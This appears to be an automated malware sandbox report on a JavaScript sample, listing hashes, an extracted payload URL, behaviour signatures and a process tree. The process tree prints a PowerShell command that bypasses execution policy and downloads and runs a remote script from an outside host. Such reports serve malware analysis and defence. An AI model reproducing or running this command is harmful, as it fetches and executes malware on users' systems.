Analysis
-
max time kernel
122s -
max time network
127s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:23
Static task
static1
Behavioral task
behavioral1
Sample
6688ba0f6d277c34f47f6aaddcd4794f3d019f6aaf56caf07c18d56d5bc77c41.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
6688ba0f6d277c34f47f6aaddcd4794f3d019f6aaf56caf07c18d56d5bc77c41.js
Resource
win10v2004-20240226-en
General
-
Target
6688ba0f6d277c34f47f6aaddcd4794f3d019f6aaf56caf07c18d56d5bc77c41.js
-
Size
73KB
-
MD5
b7de158113029fa1f14355c99f715ac8
-
SHA1
638d00e2394cd5ac45d12aea3c7a708e01dcb3ad
-
SHA256
6688ba0f6d277c34f47f6aaddcd4794f3d019f6aaf56caf07c18d56d5bc77c41
-
SHA512
15e84ee92a5c9ec273955f4d94e2bd722c94e9051a7e36a27c9416f73eec9b05a1b072718bb264f47e204e4e4c7a9091d96c168d000ca06db22b4f1f105b40a1
-
SSDEEP
1536:voChqle4yZ7K1Kho+QU0+xNUa4n33jcbo/MQsAkNn39vc5tgZF013:QChUyZ70K2+BSau4s/MQstNn3lc5Jp
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2628 powershell.exe 4 2628 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2628 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2628 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2208 wrote to memory of 2628 2208 wscript.exe 28 PID 2208 wrote to memory of 2628 2208 wscript.exe 28 PID 2208 wrote to memory of 2628 2208 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\6688ba0f6d277c34f47f6aaddcd4794f3d019f6aaf56caf07c18d56d5bc77c41.js1⤵
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-